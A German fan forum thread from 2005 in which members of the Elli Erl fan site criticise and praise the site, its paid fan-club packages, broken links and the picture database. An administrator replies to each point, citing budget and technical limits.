Elli E. Forum  

Zurück   Elli E. Forum > News und Ankündigungen > News

News News über Elli

Thema geschlossen
 
Themen-Optionen Thema bewerten Ansicht
  #16  
Alt 14.07.2005, 11:05
Benutzerbild von Halfmachine
Halfmachine Halfmachine ist offline
Registrierter Benutzer
 
Registrierungsdatum: 03.2005
Ort: Raunheim (Ghetto in Hessen)
Alter: 37
Beiträge: 525
Halfmachine befindet sich auf einem aufstrebenden Ast
Nicht zu vergessen gewisse kurzfristige Gewinnspiele die gewissen Leuten gewisse Träume erfüllen

Hab mich noch gar nicht für bei dir bedankt Sabine, möchte ich hiermit nachholen:

DANKE !
__________________
Erbarmen!

Zu Spät! Die Hesse komme!

__________________________

[url]http://www.myspace.com/freaknerd[/url]
  #17  
Alt 14.07.2005, 13:02
Benutzerbild von Nicki
Nicki Nicki ist offline
Registrierter Benutzer
 
Registrierungsdatum: 01.2004
Ort: Nürnberg
Alter: 46
Beiträge: 545
Nicki befindet sich auf einem aufstrebenden Ast
Nicki eine Nachricht über Yahoo! schicken

Mich freut:
- dass uns die Administratoren diesen Thread zur Verfügung gestellt haben
- die Übersichtlichkeit dieses Forums, dieser Page überhaupt
- die leichte Bedienbarkeit des Forums


Die Hauptkritikpunkte wurden ja von meinen Vorrednern bereits sehr gut aufgelistet. Dem schließe ich mich an und verkneife es mir, die ganzen Punkte nochmals aufzuzählen.
Eine Sache (weiß nicht, ob sie hier schon erwähnt wurde) stört mich mächtig gewaltig. Und zwar ist das die Kommunikation zwischen „Forumpersonal“ und „Forumnutzern“ … ich sage nur: Der Ton macht die Musik! Es ist doch so, dass die Seite/das Forum von den Fans und Nutzern lebt. Hier hatte man in der Vergangenheit aber oft das Gefühl, dass man sich als Nutzer glücklich schätzen sollte, mitmischen zu dürfen und Teil dieser Gemeinschaft zu sein. Auch hatte man das Gefühl, überhaupt nicht ernst genommen zu werden. Das gilt für das Forum und auch für den Chat. So funktioniert das aber nicht. Eine Gemeinschaft kann nur existieren, wenn man sich gegenseitig Respekt zollt.
Und genau das wünsche ich mir für die Zukunft: mehr Respekt und bessere Kommunikation.
__________________
[COLOR=Purple]"Ein Tag ohne Lächeln ist ein verlorener Tag!"[/COLOR]
  #18  
Alt 14.07.2005, 17:08
Benutzerbild von KathyHH
KathyHH KathyHH ist offline
Registrierter Benutzer
 
Registrierungsdatum: 01.2004
Ort: Hamburg City
Alter: 39
Beiträge: 1.800
KathyHH befindet sich auf einem aufstrebenden Ast
KathyHH eine Nachricht über ICQ schicken KathyHH eine Nachricht über MSN schicken KathyHH eine Nachricht über Yahoo! schicken KathyHH eine Nachricht über Skype™ schicken
klasse thema,

Kann mich eigentlich nur Elli Live fasn und den anderen nur anschließen und sagen das ihr den nagel auf den kopf getroffen habt mit dem was ihr schreibt...vondaher kann ich dem auch nix mehr hinzufügen weil alles gesagt wurde so wie es ist...
hoffentlich kommt das auch bei den richtigen leuten an,so das sich was ändert...

lg kathy
__________________
[B][URL="http://www.beepworld.de/members33/contradog/"][/URL]
[U]WE WANT YOU!! [/U][SIZE=2][URL]http://www.blue-devilyns.de/[/URL][/SIZE][/B][B][SIZE=2][U][/U][/SIZE]
[/B]

[B][COLOR=Black]Die Musik drückt das aus, was nicht gesagt werden kann und worüber zu schweigen unmöglich ist...

Verstehen kann man das Leben nur rückwärts.
Leben muss man es vorwärts ....
[/COLOR][/B]
[U][CENTER][B][SIZE=2][COLOR=Red]Mandy mein Schatz ICH LIEBE DICH ÜBERALLES*kuss*[/COLOR][/SIZE][/B][/CENTER]
[/U]
  #19  
Alt 15.07.2005, 04:08
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Saturn
Beiträge: 110
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
Zitat:
Zitat von Elli live Fan
Auf die Gefahr hin, wie man es macht, es verkehrt zu machen, will ich mich dennoch äußern.

Ach was, wir haben um input gebeten, folglich lesen wirs auch und freuen uns mehr oder weniger drüber, ich werds trozdem einfach mal kommentieren

Punkt 1: Nicht mehr funktionierende Links
Danke.
Kleine Anmerkung: eine Quellenangabe (also auf welcher Seite der Link vorkam) wär ebenfalls hilfreich gewesen - dann brauch ich nicht erst danach suchen

1.1 Datenbank http://www2.elli-e.de/picture-db/
Ich schätz mal aus peters altem posting hier im forum? .. geaendert.

1.2 Pantarei http://www.pantarei.de/
Links seite schaetz ich mal.. entfernt.

1.3 Videos http://ankelatenight.sat1.de/archiv/...-02-index.html
entfernt.

http://www.tivi.de/fernsehen/tabalug...703/index.html
Falsch, funktioniert noch (in einigen Browsern).

Offenbar hat die Seite Probleme mit einigen Browsern im Firefox funktioniert nach der Auswahl nichts mehr, im Opera funktioniers problemlos, wenn man den Link nach der Auswahl nimmt funktionierts auch im firefox wieder.

http://www.tivi.de/fernsehen/tabalug...x=17&play.y=8#
http://www.tivi.de/fernsehen/tabalug...x=14&play.y=10

..oder direkt im RM öffnen :
http://rstreaming.zdf.de/tivi/300/040914_357_tab.ram

Letztlich liegt das Problem mit dem tivi Link nicht bei uns und somit auch ausserhalb unseres Einflussbereiches... da der Link in einigen Browsern noch funktioniert bleibt er erstmal.

Die RTL links konnt ich irgendwie nicht überprüfen, verbleiben erstmal, die Seiten bei RTL scheinen jedenfalls noch zu funktionieren..


Zitat:
Zitat von Elli live Fan
Wobei ich es jetzt eher peinlich finde, die Administration auf die Links aufmerksam zu machen.
Peinlich für wen? -- Für uns jedenfalls sicherlich nicht, denn qualitativ hochwertige Wartung von älterem Content kostet viel Zeit - und damit zwangsläufig auch Geld, da letzteres hier nicht vorhanden ist, ist man auf Hinweise der Nutzer angewiesen. So gesehen tust Du dir und den anderen Benutzern einen gefallen damit und ich opfere auch gern ein paar Minuten den Hinweisen nachzugehen und zu beheben sofern möglich

Zitat:
Zitat von Elli live Fan
Somit entscheidet nur das Portemonaie, bzw. die Zahlungswilligkeit über Ausstattung oder Komfort der Mitgliedschaft, statt das Engagement, die Treue zu elli-e. und die täglich Präsenz.
Wenn die Marktlage es zulassen würde ausserordentlich grosses Engagement und Treue durch billigere oder kostenlose FC-Pakete zu belohnen wär das evtl auch einer Überlegung wert - tut sie aber momentan leider nicht.. wenn die Lage anders wär müsste man sich als nächsten Schritt dann Gedanken über eine Definition zur Messbarkeit von Engagement und Treue machen.


Zitat:
Zitat von Elli live Fan
2.4 Keine Offenlegung der Finanzen:
Was wäre, wenn , nur so als Beispiel, 120 Fanclub-Mitglieder den Fanclub 100 geordert hätten. Wohin wäre der finanzielle Überschuss geflossen?
Es gibt eine Kostenaufstellung, die für Mitglieder einsehbar ist.. von Gewinnen kann allerdings keine Rede sein bisher. 120 fc100 Kunden wär super, momentan haben wir noch nichtmal 1/30zigstel davon.. das ganze Projekt macht also weiterhin Verlust bisher.

Aber um auf Dein imaginäres Beispiel zurückzukommen.. hätten wir 120 FC100 Kunden würden wir von den erwirtschaffteten Erträgen erstmal die Verluste ausgleichen und danach in den weiteren Ausbau der Seite investieren.. und selbstversändlich würde man bei einer stark veränderten Nachfrage auch die bestehenden Preismodelle an der neue Marktlage orientieren können.

Zitat:
Zitat von Elli live Fan
2.5 Auflistung der Fanclub 100 Mitglieder öffentlich unter "Forum-Mitarbeiter".
Hmm bug, wird sicherlich demnächst gefixt, danke.


Zitat:
Zitat von Elli live Fan
2.6 Die Rubrik Bilder können sich nur noch Fanclub Mitglieder ansehen. Der Verweis auf die Bilder- Datenbank hinkt, da dort keine Kommentare zu Bildern abgegeben werden können.
Hmm kann ich leider nicht nachvollziehen. Sogar unangemeldet kann ich mir die Rubrik Bilder im Forum ansehen http://forum.elli-e.de/forumdisplay.php?f=21. Hab ich da was missverstanden?

Abgesehen davon, kann man problemlos ein Posting in der Rubrik machen mit den Kommentaren zu bestimmten Bildern und dann einen Link zu bestimmten Bildern in der DB angeben. Den Link sollte man aber aus Rücksicht auf die Leute mit etwas langsameren Internetverbindungen als TextLink vornehmen, damit die Leute erst nach Lesen des Beitrags entscheiden können ob sie denn wirklich auch das Bild / die Bilder sehen wollen. Ausserdem bietet die Datenbank auch genug Beschreibungsfelder bei den Bildern an, so das sich die meisten Kommentare (z.b. wer ist auf dem bild, von wann/wo etc..) erübrigen dürften.

Also nochmal in kurz rekapituliert:
Kommentar zum Bild (sofern nötig) ins Forum, Bild in die Datenbank.

Beispiel:
Code:
Topic: Bilder vom Konzert xy, am 01.01.2020

Hallo Leute, ich hab ein paar huebsche Bilder vom Konzert xz hochgeladen..

Und so sah das dann aus am anfang... 
Spannung lag in der Luft als Elli auf die Bühne kam, sie erzählte uns...
und danach hörten wir dann ... 
http://www.elli-e.de/index.php?OpenD...dbdisp&id=1137

Und hier auf dem Bild sieht man xzy, im blau-gruen gestreiftem pulli 
und daneben .. usw usw.. 
http://www.elli-e.de/index.php?OpenD...dbdisp&id=1138
Vorteil:
- Bilder sind per Suchmaske in der Datenbank suchbar.
- Laden schneller
- Bilder sind auf Viren geprüft - auch in Bildern können sich bösartige Viren verstecken
- Besucher die nicht das Forum Besuchen kommen trozdem in den Genuss des Bildes/der Bilder.
- Alle sind Glücklich.

Zitat:
Zitat von Elli live Fan
2.7 Schlechte oder gar keine Aktualisierung der Konzert-Termine auf der Startseite.
Generell gilt das wir nur Konzert Termine veröffentlichen die auch offiziell abgesegnet sind, das hat rechtliche Gründe.

Sollten dennoch Termine existieren die schon offiziell abgesegnet sind aber noch nicht dastehen, wurden sie uns entweder noch nicht entsprechend von offizieller seite mitgeteilt oder Peter hatte noch keine Zeit sie einzutragen, letzteres sollte aber eher selten der Fall sein..

Zitat:
Zitat von Elli live Fan
Punkt 3: Lob
3.1 Übersichtliches Forum
3.2 Dieser Thread
Danke ich werds weiterreichen

Das Lob fürs Forum muss man wohl eher den Foren Programmierern zugute schreiben - die lassen sich auch gut dafür bezahlen und das Lob für das Posting hier geht eindeutig an Peter. Na wenn ich schon keines für die leichte Umgestalltung der Seite und das FC Kontrollzentrum und die Integrierung der Bilderdatenbank bekomme, vielleicht bekomm ich ja eines fürs fixen der Links und die Antwort heheh.

Scherz beiseite, danke für deine Meinung.

Geändert von Mikey (15.07.2005 um 07:39 Uhr)
  #20  
Alt 15.07.2005, 05:29
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Saturn
Beiträge: 110
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
Zitat:
Zitat von Mazemi
1.1.)ich finde die Homepage farblich zu trist, für eine junge dynamische Künstlerin wie Elli ist sie finde ich farblich sehr erdrückend. Fast statisch und 'schwer', ein Auffrischen in hellere, wärmere Farben fände ich passender.
Da hast Du völlig recht und ich hätt vermutlich auch gern was anderes, aber das ist leichter gesagt als getan, denn sich soetwas designen zu lassen liegt leider nicht im Budget. Wir haben uns auch schon diverse webtemplate Librarys angesehen wo man entsprechend vorgefertigte Designvorlagen kaufen kann.. aber leider entsprachen die Templates dann auch entweder nicht unseren Vorstellungen was Farbe und Design angeht oder boten schlichtweg nicht den nötigen platz um all den content unterzubringen den wir hier haben - man kann wohl mit recht behaupten das wir weit mehr Content haben als die meisten Seiten anderer Künstler.

Rekapituliert, das Design was wir bräuchten müsste,
1. gut aussehen und zu Elli passen
2. genug Platz fuer Content bieten
3. technisch vernueftig realisiert sein
3.1 leicht anpassbar, z.b. flash ist eher ungünstig zu editieren.
3.2 html basiert (XHTML 1.0 Transitional konform nach Möglichkeit)
3.3 keine Frames
4. zur kommerziellen Nutzung verfügbar sein, rechtlich komplikationsfrei
5. kostengünstig

Und zu allem Überfluss würde eine Designänderung dann auch wieder richtig viel arbeit bedeuten, vorallem für mich, denn ich müsste das neue Design in entsprechende Templates fuer das php script das ich für die Seite geschrieben hab umwandeln.

Zitat:
1.2) ich finde auch die Berechtigungsskala wenn man 100 Euro zahlen will zu weit gehend. Ich finde nicht, daß jeder der diese Summe zahlen möchte, automatisch quasi Administratorrechte erhalten sollte. Das führt nur wieder zu Dissenz.
Ganz soweit gehen die Rechte nicht

Zitat:
1.3) portieren von Bildern aus den Anhängen der bestehenden einzelnen Thread Postings in die Bildergalerie, quasi lösen vom Text. So würden die, die uns alle immer mit Photos versorg(t)en nicht Gefahr laufen ihr upload Kontingent zu 'verbraten'. Ich fände es unfair, denen die sich die Mühe machen, andere daheimgebliebene mit Photos zu versorgen, dafür mit Platzproblemen zu bestrafen. Wenn dies aus technischen Gründen nicht gehen sollte, was ich mir nicht vorstellen kann, dann sollten die wenigen die immer die Photos uploaden auf ihr bestehendes Kontingent den Faktor n hinzugerechnet bekommen, damit sie wieder posten können.
Falsch, genaugenommen würde das sogar sehr viel Arbeit machen.

Das fängt schon dabei an das ich gar nicht wüsste in welchem Format das Forum die Bilder überhaupt abspeichert, in welchem Table die liegen wie der Eintrag mit dem eigentlichen Posting verknüft ist usw usw.. mit anderen Worten müsste erstmal eine genaue Analyse vorgenommen werden von wo und wie man was importieren will danach müsste man ein entsprechendes Script schreiben und wenn man das auch noch automatisieren will für zukünftige Postings macht das sogar noch wesentlich mehr Arbeit, da das script dann wesentlich komplexer wird.

Dazu kommt das Problem das bei einem solchen Bilderimport die Bilder keine Beschreibung hätten und damit in der Bilderdatenbank quasi unbrauchbar sind.. sprich man kann nicht danach suchen usw.. ein Script könnte wohl kaum aus den entsprechenden Foren-Beiträgen die nötigen Informationen herausfiltern, wobei man dann letzlich auch noch einer manuellen Nachbearbeitung von vielen hunderten(?) von Bildbeschreibungen ins Auge sehen müsste.

Und das Sahnehäupchen auf dem ganzen wäre das keineswegs sichergestellt ist das nach dem nächsten Update der Forensoftware das Script überhaupt noch laufen würde (z.b. Änderungen an der ForenDB Struktur) - sprich evtl.noch mehr Arbeit an der Wartung des Scripts.. denn die Forensoftware muss man regelmässig updaten um Sicherheitsproblemen vorzubeugen.

Zusammengefasst schauen wir dabei also auf eine Problemlösung die sich aus meiner Sicht überhaupt nicht finanzieren lässt momentan wobei die Lösung des Problems eigentlich auf der hand liegt, man motiviert die Benutzer durch entsprechende Attachment Limits *fg* gleich dazu die Bilder in der DB verfügbar zu machen und selber zu beschreiben. Sofern Benutzer zusätzliche Kommentare abgeben wollen zu dem Bild die nicht in eines der vorhandenen Datenbank Felder passen, kann man ja problemlos ein entsprechendes Posting im Bilder Bereich anlegen und die Links zu den Bildern angeben (siehe auch mein Beispiel dazu im vorangegangen Beitrag) .. TextLinks nach Möglichkeit, um unnötige Ladezeiten bei den Betrachtern zu vermeiden.

Ausblick, evtl. zukünftige Features
Aber um auch noch einen positiven Ausblick zu geben im hinblick auf neue Features, wir überlegen evtl eine Bewertungsfunktion in die Bilderdatenbank einzubauen so das Mitglieder die Bildqualität bewerten können und ggf. wird es auch einen Kommentarlink geben in der Bilderdatenbank wo man die einzelnen Bilder zusätzlich noch Kommentieren kann - da es ja Bedarf an zusätzlichen Kommentaren zu Bildern gibt.

Das ist jedoch alles erst in der Planung und wir werden dazu erstmal ein entsprechendes Konzept ausarbeiten müssen auch im hinblick auf die Verfügbarkeit der Kommentarfunktion und natuerlich der Administration/Abuse Control solcher Kommentare... wenn die Planung abgeschlossen ist werden dann entsprechende Templates und Code geschrieben werden, die Funktionen gestet und letztlich in die Produktions-Version implementiert.. letzlich also viel Arbeit die da noch vor uns (mir in dem Fall) liegt und ich werde noch keine Aussagen dazu machen wann eine solche Funktion denn verfügbar sein könnte oder wie das genau aussehen wird - zumal eigentlich auch hier das leidige Finanzierungsproblem besteht.

Zitat:
Zitat von Mazemi
1.4) man sollte länger Beiträge ändern/bearbeiten können, nicht nur 24 Stunden
Das Limit dient vorallem zur Vermeidung das Diskussionen undurchsichtig werden denk ich... wenn man Tage spaeter etwas an einem seiner älteren Beiträgen ändert, führt das u.U. bei Leuten die das danach lesen zu Verwirrung und die Antworten passen dann ggf. nicht mehr.. ausserdem werden nachträglichen Änderungen auch meist von den anderen übersehen..

Alles in allem denk ich macht das Feature schon Sinn das man nicht ändert was man vor Tagen oder Wochen mal gesagt hat.. wenn man was hinzuzufügen hat kann man das ja in einer Antwort auf das Posting machen.. so sehen die anderen dann auch leichter den neuen Beitrag.

Soweit ich weiss kann man seine Attachments trozdem auch weiterhin über das Kontrollzentrum verwalten.. Insofern sollte das Limit auch kein Problem mit dem Attachmentplatz darstellen.

Zitat:
Zitat von Mazemi
1.5) Der neue Chat treibt mich zum Wahnsinn! Alle 5 Minuten muss ich mich neu anmelden, fliege raus. Das macht echt keinen Spaß mehr. Bin immer super genervt, weil ich schon beim betreten weiß, daß ich gleich wieder rausfliege! Schade! Seit dem meide ich den Chat wegen des Frustfaktors!
Das liegt entweder am Browser oder an der Netzwerkverbindung denk ich, oder am Ram Bei mir läuft der Chat schon meist mehrere Stunden am Stück problemlos, bis er dann zu langsam und zu ressourcen hungrig wird. Peter meint das es da ggf. auch probleme mit Laptops gibt, obwohl ich dazu anmerken muss das sich der Zusammenhang zu Laptops und Probleme mit Java Applets meinem Kenntnisstand entzieht.

Zitat:
Zitat von Mazemi
1.6.) Fotos müssen für alle Fans, und solche die es werden sollen, zugänglich sein!
Die Bilderdatenbank ist allen zugänglich, nutze sie!

Zitat:
Zitat von Mazemi
1.7.) Icons im GB sollten erweitert werden, ein paar Blumen? Ist ja bald wieder Muttertag!
*zustimm* find ich gut den Vorschlag
ein Job für peter..

Zitat:
Zitat von Mazemi
3.2.) Bei nahezu 1200 Anmeldungen im Forum, fände ich es ok von denen auch ca. 5,00€ Jahresgebühr zu nehmen. Man könnte es ihnen vielleicht schmackhaft machen, daß wenn sie sich statt dessen für die günstigste Variante von 12€ (ist das die günstigste Variante?) entschließen sollten, für das erste Jahr eine Gutschrift von den 5€ machen würde. Dann hätte man immer noch eine zusätzliche Einnahme von je 7€, das neue Mitglied zusätzliche Funktionalitäten, ansonsten hätte man immerhin 5€. Ich denke, das ist nicht zu viel verlangt. 3 Apfelsaftschorle im Harp - oder sonst wo - sind teurer, oder 2 Päckchen Kippen usw.
Ich denk nicht das jeder der im Forum angemeldet ist dafür was zahlen würde.. im Gegenteil eher, ich denk das wenn wir allein für die Nutzung des Forums eine Gebühr nehmen würden, sich kaum einer noch anmelden würde, und wir mit hunderten "wie kann ich mich abmelden vom forum" (technisches Problem) Mails überschüttet würden und generell find ich es auch eher unseriös Geld zu nehmen allein dafür man ins Forum schauen kann.. wer das Projekt unterstüzen will hat ja genug Möglichkeiten über die einzelnen FC Packete.. die zahl der Leute die unser Projekt hier unterstützen wollen ist aber eher ziemlich überschaubar würd ich sagen.

Geändert von Mikey (15.07.2005 um 08:08 Uhr)
  #21  
Alt 15.07.2005, 18:21
Benutzerbild von Elli live Fan
Elli live Fan Elli live Fan ist offline
Registrierter Benutzer
 
Registrierungsdatum: 04.2004
Ort: Dortmund
Beiträge: 5.279
Elli live Fan befindet sich auf einem aufstrebenden Ast
@ Mikey
Lieben Dank für für Deine Antworten.

Möchte mich abschließend doch noch zu einigen Topics äußern, nicht nur, um zu widersprechen, sondern hauptsächlich, um den Lesern die Möglichkeit zu geben, sich selbst ein Urteil zu bilden, und auch um zur Diskussion einzuladen, sodass weiter niemand vergrault wird. (habe es schließlich versprochen)

Zitat:
Zitat von Mikey
Kleine Anmerkung: eine Quellenangabe (also auf welcher Seite der Link vorkam) wär ebenfalls hilfreich gewesen - dann brauch ich nicht erst danach suchen
Sorry, aber ich dachte, Administratoren kennen auch ihre Seite in -und auswendig.
Die Auflistung sollte auch keine Kritik hinsichtlich der Nichtfunktionalität von Links darstellen, sondern nur ein Hinweis meinerseits sein.
Zitat:
Zitat von Mikey
Offenbar hat die Seite Probleme mit einigen Browsern im Firefox funktioniert nach der Auswahl nichts mehr, im Opera funktioniers problemlos, wenn man den Link nach der Auswahl nimmt funktionierts auch im firefox wieder.
Mein Fehler, hatte nur meinen Lieblings-Browser ausprobiert.
Zitat:
Zitat von Mikey
Die RTL links konnt ich irgendwie nicht überprüfen, verbleiben erstmal, die Seiten bei RTL scheinen jedenfalls noch zu funktionieren..
Ich vermute, dass RTL die Links nicht mehr führt. Die Seitennummerierung unter "Webclips" geht nur bis Seite 46-50 mit dem Veranstaltungsdatum 20.10 2004. Das Ringfest war aber schon am 14.08 2004 und der Fallschirmsprung ist datiert vom 05.07.2004.
Zitat:
Zitat von Mikey
Wenn die Marktlage es zulassen würde ausserordentlich grosses Engagement und Treue durch billigere oder kostenlose FC-Pakete zu belohnen wär das evtl auch einer Überlegung wert - tut sie aber momentan leider nicht.. wenn die Lage anders wär müsste man sich als nächsten Schritt dann Gedanken über eine Definition zur Messbarkeit von Engagement und Treue machen.
Der Grundtenor meiner Aussage war nicht, den engagierten Mitgliedern irgendwelche Boni einzuräumen, sondern eher, ihnen nicht unnötig Steine in den Weg zu legen. Ich halte die unkritische Auswahl von Mitgliedern, gestaffelt nach der Dicke des Portemonnaies, für den falschen Weg.
Sagt das Zahlen eines hohen Beitrags etwas über die Zuverlässigkeit und Seriösität in Bezug auf die Ausübung z.B. der Löschfunktion des Gästebuches aus?
Wer viel zahlt, dem sind Tür und Tor geöffnet, egal wie eng verbunden er mit dem Forum ist?
Möchte selbstverständlich den edlen Höchst-Zahlern nicht generell die Rechtschaffenheit absprechen, aber es müssten meiner Meinung nach andere Auswahlkriterien für die Mitarbeit an der Page und im Team gelten. Es macht auch gute Chefs aus, dass sie versuchen, ihre emotionale Intelligenz richtig einzusetzen im Auswählen und Führen von Mitarbeitern.
Zitat:
Zitat von Mikey
Hmm kann ich leider nicht nachvollziehen. Sogar unangemeldet kann ich mir die Rubrik Bilder im Forum ansehen http://forum.elli-e.de/forumdisplay.php?f=21. Hab ich da was missverstanden?

Du hast bestimmt bemerkt, dass das Wort Rubrik von mir fehl am Platze war. Sicherlich können Nicht-Fanclub-Mitglieder die ganze Rubrik aufrufen, aber kein einziges gepostetes Bild ansehen.

Danke, den Tipp mit den Links zur Datenbank zwecks Kommentierung haben ich und andere schon angewendet.
http://forum.elli-e.de/showthread.php?p=61358#post61358

Dennoch ist es nicht mehr möglich, jeden Schnipsel, der es aber nicht verdient, in der Datenbank zu landen, zu posten bzw. anzusehen.



Zitat:
Zitat von Mikey
Generell gilt das wir nur Konzert Termine veröffentlichen die auch offiziell abgesegnet sind, das hat rechtliche Gründe.

Sollten dennoch Termine existieren die schon offiziell abgesegnet sind aber noch nicht dastehen, wurden sie uns entweder noch nicht entsprechend von offizieller seite mitgeteilt oder Peter hatte noch keine Zeit sie einzutragen, letzteres sollte aber eher selten der Fall sein..
Ich kann von mir aus nicht beurteilen, wo es hakt, nur dass dem so ist.

Fakt ist, dass z.B. vor Kurzem zwei Termine ( 06.07 2005 Schauspielhaus Düsseldorf (unplugged) und 07.07.2005 Bochum Total 18.15 Uhr unplugged Bühne )auf der Startseite unter "Nächster Auftritt" http://www.elli-e.de/index.php?OpenDocument=home
einfach unter den Tisch fielen, statt dessen immer der alte CSD Termin erwähnt wurde.
Allerdings konnten weiterforschende Besucher diese Termine selbstverständlich unter der Terminauflistung finden.
Bei meinen Bemühungen, Informationen über Auftritte zu bekommen, haben sich oft nette wechselseitige E-mail Kontakte ergeben. So freuen sich die Partner am anderen Ende der Leitung über ein Bewerben ihrer Veranstaltung, bei denen Elli zu Gast ist. Oft wird meine Bitte um gleichzeitige Reklame für Elli und diese Page tatkräftig unterstützt. Die Veranstalter würden es bestimmt gerne sehen, auch auf der Startseite Beachtung zu finden.

Ein anderes, etwas zurückliegendes Beispiel: Konzert in Weiden
Kurz vor dem Beginn des Elli Auftritts in Schierling , sechs Tage vor Weiden, erklärte Peter, der Weidentermin wäre nun gesichert.
Der Kartenverkauf lief seit Wochen, die Plakate hingen regional überall, die Hotels und Zugfahrten waren gebucht.

Ich denke mal, dass für die mangelnde Kommunikation alle beteiligten Partner verantwortlich sind. Aber bei der einzigen offiziellen Elli-Homepage wäre ein gelegentliches Miteinander bestimmt förderlich.



Möchte bei dieser Gelegenheit noch zwei Punkte ansprechen:

1. Renommée
Ich halte diese Klassifizierung von Mitgliedern für überflüssig, Sie dient nur dem Schüren von Intrigen und Machtkämpfen.
Sie ist in ihrer Aussagekraft sowieso völlig unglaubwürdig, da die Möglichkeit der Manipulation unschwer an dem hiesigen Führenden und seinem Pendant dazu als Schlusslicht zu erkennen ist.

2. FC-Kontrollzentrum
Wozu dient die Hinterlegung der Daten und wer kann sie außer mir einsehen?

Komme nun zum Schluss.

Ich finde, es wäre ein tolles Signal menschlicher Größe von Seiten der Administration, den Usern hier auch bei den Fanclub-Beiträgen entgegenzukommen.
Ist nicht der Spatz in der Hand wertvoller als die Taube auf dem Dach? Lieber viele kleine Beitragszahlungen, als zu wenig Große?

Ich würde es unter dem Aspekt der Kundenfreundlichkeit echt begrüßen, wenn es in diesem und/oder den anderen Punkten zu einen "Reset" käme, im Interesse der Homepage, der noch vorhandenen Fans, bzw. derer, die undercover das ganze Procedere aus der Distanz beobachten und der Künstlerin.
Zitat:
Zitat von Elli Fanclub RELAUNCHED
Sollte es uns nicht gelingen bis 1. August genügend Finanzmittel aufzubringen, um den Betrieb für ein Jahr sicherzustellen, wird die Seite komplett geschlossen. Gezahlte Beträge werden hierbei dann anteilig zurücküberwiesen. Es liegt in eurer Hand...
Zitat:
Zitat von Mikey
Es gibt eine Kostenaufstellung, die für Mitglieder einsehbar ist.. von Gewinnen kann allerdings keine Rede sein bisher. 120 fc100 Kunden wär super, momentan haben wir noch nichtmal 1/30zigstel davon.. das ganze Projekt macht also weiterhin Verlust bisher.
Falls es aus finanziellen Gründen zu einer Schließung der Seite kommen wird, möchte ich schon mal den Anfang machen und mich auf diesem Wege bei allen Forum-Usern entschuldigen, bei denen ich im Laufe der Zeit mal nicht den richtigen Ton getroffen habe. Es ist nicht immer leicht, das geschriebene Wort unmissverständlich einzusetzen.
Trotzdem gab es einen unwahrscheinlich fairen Umgang miteinander und ich habe mich über jeden einzelnen Zuspruch sehr gefreut.
War auf meinen Reisen durch's Web schon in vielen Foren zu Besuch, aber ihr seid die Treuesten, die eine Homepage-Administration und ein Künstler haben kann.

Ansonsten kann ich nur hoffen, dass Elli aus den USA schon eine neue Fangemeinde mitbringt, oder bald einen Riesenhit landet, sodass der Fanpool mit neuen Kräften aufgefüllt wird.


Bedanke mich für die geschenkte Aufmerksamkeit beim Team.

LG Elli live Fan
__________________
Aktuelle Informationen über Elli Erl findet ihr nur im neuen Forum auf der offiziellen Homepage
www.elli-e.com

Elli Tour und TV








Geändert von Elli live Fan (15.07.2005 um 23:16 Uhr)
  #22  
Alt 15.07.2005, 21:00
Benutzerbild von Mikey
Mikey Mikey ist offline
Administrator
 
Registrierungsdatum: 11.2003
Ort: Saturn
Beiträge: 110
Mikey ist zur Zeit noch ein unbeschriebenes Blatt
Zitat:
Zitat von Elli live Fan
@ Mickey
Lieben Dank für für Deine Antworten.
Und ich schreib mich immernoch ohne "c"
Mickey mit c kommt von der Maus, mit der hab ich aber ansich nichts gemein ausservielleicht der Scheibe Käse auf meinem Abendbrot.. mikey (ohne c) kommt dagegen von mike der englischen Variante von Michael und nein ich bin kein Mikrophon auch wenn das irgendwie in den Kontext passen würde.

Zitat:
Zitat von Elli live Fan
Sorry, aber ich dachte, Administratoren kennen auch ihre Seite in -und auswendig.
Die Auflistung sollte auch keine Kritik hinsichtlich der Nichtfunktionalität von Links darstellen, sondern nur ein Hinweis meinerseits sein.
Administratoren wissen alles, können alles, sind (omni-)potent (ja ich hab omni in Klammern geschrieben für Peter *g*), sind immer im Recht, können 200 Mails die Minute beantworten, haben alle Kundendaten auswendiggelernt und können jedes Foren Posting sogar rückwärts singen.. schön wärs

Scherz beiseite, dem ist natürlich nicht so und die Hinweise waren gern gesehen, wir hatten ja darum gebeten

Zitat:
Zitat von Elli live Fan
Der Grundtenor meiner Aussage war nicht, den engagierten Mitgliedern irgendwelche Boni einzuräumen, sondern eher, ihnen nicht unnötig Steine in den Weg zu legen. Ich halte die unkritische Auswahl von Mitgliedern, gestaffelt nach der Dicke des Portemonnaies, für den falschen Weg.
Sagt das Zahlen eines hohen Beitrags etwas über die Zuverlässigkeit und Seriösität in Bezug auf die Ausübung z.B. der Löschfunktion des Gästebuches aus?
Nun man muss für mehr Geld auch mehr Features bieten, abgesehen davon spart es uns auch arbeitszeit wenn die Fans die offenbar sehr am Erhalt der Seite interessiert sind, sich selber um einige Trolle im Gästebuch kümmern, quasi 2 Fliegen mit einer Klappe Denn die Administration des Gästebuchs kostet viel arbeit, es gibt doch leider immernoch genug Trolle.

Zitat:
Zitat von Elli live Fan
Wer viel zahlt, dem sind Tür und Tor geöffnet, egal wie eng verbunden er mit dem Forum ist?
Möchte selbstverständlich den edlen Höchst-Zahlern nicht generell die Rechtschaffenheit absprechen, aber es müssten meiner Meinung nach andere Auswahlkriterien für die Mitarbeit an der Page und im Team gelten. Es macht auch gute Chefs aus, dass sie versuchen, ihre emotionale Intelligenz richtig einsetzen im Auswählen und Führen von Mitarbeitern.
1) Nun "Tür und Tor geöffnet" kann man da nicht sagen, wir werden uns um Kunden kümmern die solche Funktion missbräuchlich benutzen - sofern sowas mal vorkommen sollte.

2) Und ja, generell würde ich schon sagen das den Leuten die einen höheren Beitrag bezahlen auch deutlich mehr daran interessiert sind das die Seite weiterbesteht, denn wie man ja sieht existiert ein deutlicher Kausalzusammenhang zwischen Einnahmen und weiterbestehen.

3) emotionale Intelligenz... also ich geh an die sache eher rational ran.. Und die Mitarbeiter wurden auch früher nicht nach Ihrem Beitrag ausgewählt und das werden sie auch heute nicht, hier gehts schlichtweg um Features.. man kauft ein gewisses Produkt man ist damit nicht direkt Mitarbeiter, auch wenn einige der Features gewisse Moderationsfähigkeiten verleihen.

Zitat:
Zitat von Elli live Fan
